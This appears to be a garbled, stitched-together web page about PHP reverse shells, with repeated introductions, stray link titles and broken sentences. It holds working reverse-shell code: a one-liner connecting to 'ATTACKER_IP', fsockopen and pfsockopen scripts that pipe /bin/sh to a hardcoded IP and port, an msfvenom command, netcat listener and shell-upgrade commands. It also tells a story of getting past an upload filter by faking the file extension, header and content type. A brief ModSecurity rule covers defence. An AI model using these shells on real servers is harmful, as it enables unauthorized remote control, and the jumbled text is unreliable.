PHP reverse shell is a common technique used in ethical hacking and penetration testing to gain interactive command-line access to a remote web server. Unlike a standard "bind shell" where an attacker connects directly to a server, a reverse shell
forces the server to initiate an outbound connection back to the attacker. Check Point Software How it Works Listener Setup
: The attacker starts a "listener" on their own machine (e.g., using Netcat: nc -lvnp 1234 ) to wait for incoming connections. Payload Delivery
: The attacker uploads or executes a PHP script on the target server, often by exploiting a file upload vulnerability or Remote Code Execution (RCE) Connection Establishment
: When the PHP script is run (e.g., by visiting its URL), it uses PHP's networking functions (like ) to connect back to the attacker's IP and port. Interactive Session
: Once connected, the server redirects its standard input and output to the attacker, providing a functional command-line interface Reverse Shell Attacks: Real-World Examples and Prevention
This report examines the mechanics, implementation, and security implications of PHP-based reverse shells, a common technique used by security researchers and malicious actors to gain remote access to web servers. Executive Summary
A PHP reverse shell is a script that, when executed on a target server, initiates an outbound connection to an attacker-controlled machine. This provides the attacker with an interactive command-line interface (shell) running with the privileges of the web server user (e.g., www-data or apache). 1. Core Mechanisms
The primary goal of a reverse shell is to bypass firewalls that typically block incoming connections but allow outgoing traffic.
Outgoing Connection: The script is programmed with a hardcoded IP address and port.
Process Spawning: It uses PHP functions like proc_open(), system(), or shell_exec() to spawn a shell (such as /bin/sh or /bin/bash on Linux).
I/O Redirection: The script redirects the shell's standard input (stdin), output (stdout), and error (stderr) to the established TCP connection. 2. Common Implementation Scenarios
Reverse shells are often the "second stage" of an attack, following a successful initial exploit.
A PHP reverse shell is a script designed to establish an outbound connection from a target web server back to an attacker's machine. This technique is frequently used in penetration testing and CTF (Capture The Flag) challenges to gain remote command-line access while bypassing inbound firewall restrictions. Popular PHP Reverse Shell Tools
There are several well-known scripts and tools used to generate these shells:
Pentestmonkey's PHP Reverse Shell: Widely considered the standard, this script is highly reliable and easily configurable. You can find it on GitHub or pre-installed in Kali Linux under /usr/share/webshells/php.
MSFVenom: A powerful payload generator from the Metasploit Framework that can create custom PHP reverse shells using commands like msfvenom -p php/meterpreter_reverse_tcp. Reverse Shell Php
Flast101's Cheat Sheet: Offers concise one-liner PHP commands using shell_exec to trigger shells through system binaries like /bin/bash or PowerShell. Typical Workflow for Implementation
PHP reverse shell is a script—often just a single line—that forces a target server to "call back" to an attacker's machine, handing over full command-line control of the web server. In the world of cybersecurity, it is the ultimate "gotcha" for a penetration tester.
Here is the story of a classic digital heist involving this tool. The Legend of the "Profile Pic" Breach
The story begins with a security researcher, let's call him "Alex," testing a high-security corporate portal. To the casual observer, the site was a fortress, but Alex found a tiny crack: a profile picture upload
Alex didn't upload a photo of himself. Instead, he took the famous pentestmonkey PHP reverse shell , a legendary script used by hackers worldwide. The Cat-and-Mouse Game
The server's "guards" (security filters) were tough. Alex tried several tricks to sneak the script past them: The Disguise : He renamed shell.jpg.php shell.phtml to fool the extension check. The Magic Header
: He added "GIF89a;" to the top of the file, making the server think it was a GIF image. The Final Strike
: Eventually, he found that the server only checked the "Content-Type" header. By changing it to image/jpeg
while keeping the PHP code inside, he slipped through the gate. The Moment of Truth
Alex set up a "listener" on his own laptop (using a tool called Netcat), waiting in the dark for a connection. He then navigated to the URL of his "photo":
A PHP reverse shell is a script that, when executed on a target web server, initiates an outbound connection back to your machine, providing a command-line interface to the server. This technique is commonly used during penetration testing to gain interactive access after discovering a file upload or code execution vulnerability. 1. Obtain a Reverse Shell Script
The most reliable way to establish a connection is to use an established, pre-written script.
Pentest Monkey PHP Reverse Shell: Widely considered the industry standard for PHP web shells. It provides a full interactive shell that supports interactive programs like ssh or su.
You can download it from the Pentest Monkey GitHub repository.
Kali Linux Local Copy: If you are using Kali Linux, a copy is already available at /usr/share/webshells/php/php-reverse-shell.php.
MSFVenom: You can generate a custom payload using Metasploit with the following command:msfvenom -p php/meterpreter_reverse_tcp LHOST= 2. Configure the Script PHP reverse shell is a common technique used
Before uploading, you must edit the script to point back to your machine. Open the .php file in a text editor like nano. Locate the $ip and $port variables.
Change $ip to your attacking machine's IP address (use your VPN IP if on a platform like Hack The Box).
Set $port to any open port on your machine (e.g., 4444 or 1234). 3. Start a Listener
On your attacking machine, you must set up a listener to "catch" the incoming connection. RootMe (CTF Walkthrough). A TryHackMe Lab | by Marduk I Am
A PHP reverse shell is a common technique used in penetration testing where a compromised target machine initiates a connection back to an attacker's machine . Unlike a bind shell, which waits for an incoming connection, a reverse shell bypasses inbound firewall rules by sending traffic outward to the attacker . How it Works
A reverse shell typically follows a simple three-step process:
Listener Setup: The attacker opens a port on their machine (e.g., using nc -lvnp 1234) to wait for the incoming connection .
Payload Delivery: The attacker uploads or injects a PHP script onto the target web server .
Execution: When the PHP script is executed, it opens a TCP socket and connects to the attacker’s IP and port, providing an interactive command-line shell . Common Methods & Scripts
PHP reverse shells vary in complexity, from simple one-liners to feature-rich scripts: Dhayalanb/windows-php-reverse-shell - GitHub
$evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ". $port." ". $ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir) pentestmonkey/php-reverse-shell - GitHub
php-reverse-shell * Resources. Readme. * Stars. 2.8k stars. * Watchers. 48 watching. * Forks. 1.9k forks. Reverse shell PHP with GET parameters - Stack Overflow
A PHP reverse shell is a common technique used in penetration testing to gain interactive command-line access to a remote server. Unlike a standard shell where you connect to the server, a reverse shell forces the server to initiate an outbound connection to your machine. This is highly effective because most firewalls allow outgoing traffic even if they block incoming connections. Deep Dive: Understanding and Using PHP Reverse Shells 1. How a Reverse Shell Works
In a typical client-server model, the client connects to a listening port on the server. However, a reverse shell "inverts" this:
The Attacker sets up a "listener" on their machine, waiting for a connection.
The Target (Victim) executes a script (like a PHP file) that reaches out to the attacker's IP and port. // Duplicate socket descriptors for STDIN
The Result is a communication pipe where the attacker can send commands that the target executes, returning the output back to the attacker. 2. Common PHP Payloads
There are two primary ways to deploy a PHP reverse shell: as a one-liner command or as a full script file. The "One-Liner"
If you have Remote Code Execution (RCE) via a web form or URL parameter, you can often trigger a shell with a single line:
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Use code with caution. Copied to clipboard fsockopen: Opens a TCP connection to the attacker.
exec: Runs a shell (/bin/sh) and redirects its input, output, and error streams (<&3 >&3 2>&3) to the open network socket. The Standalone Script
For more stable connections, professionals often use the PentestMonkey PHP Reverse Shell or Ivan Sincek's Shell. These scripts are more robust, handling various edge cases and providing a more "interactive" feel. Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python
Understanding and Protecting Against Reverse Shell Attacks in PHP
In the realm of cybersecurity, reverse shell attacks are a sophisticated method used by attackers to gain unauthorized access to a target system. When it comes to PHP, a popular server-side scripting language, the risk of such attacks cannot be overstated. This article aims to shed light on what reverse shell attacks in PHP entail, how they work, and most importantly, how to protect your applications against them.
A netcat shell is fragile. Upgrade it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
pfsockopen() is less commonly monitored and creates a persistent connection.
<?php
$sock = pfsockopen("192.168.1.10", 4444);
$proc = proc_open("/bin/sh -i", [0=>$sock,1=>$sock,2=>$sock], $pipes);
?>
A modern WAF (ModSecurity, Cloudflare, AWS WAF) can detect common reverse shell signatures.
Example ModSecurity rule:
SecRule ARGS "fsockopen|pfsockopen|shell_exec|system|/bin/sh" \
"id:123456,deny,status:403,msg:'PHP Reverse Shell Detected'"
<?php // Set the attacker's IP and listening port $ip = '192.168.1.10'; // CHANGE THIS $port = 4444; // CHANGE THIS// Create a TCP socket $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)<br />\n");
// Duplicate socket descriptors for STDIN, STDOUT, STDERR shell_exec('/bin/sh -i 0<&3 1>&3 2>&3');
// Close the socket fclose($sock); ?>
Warning: Unauthorized access to computer systems is illegal. This is for authorized pen-testing and educational purposes only.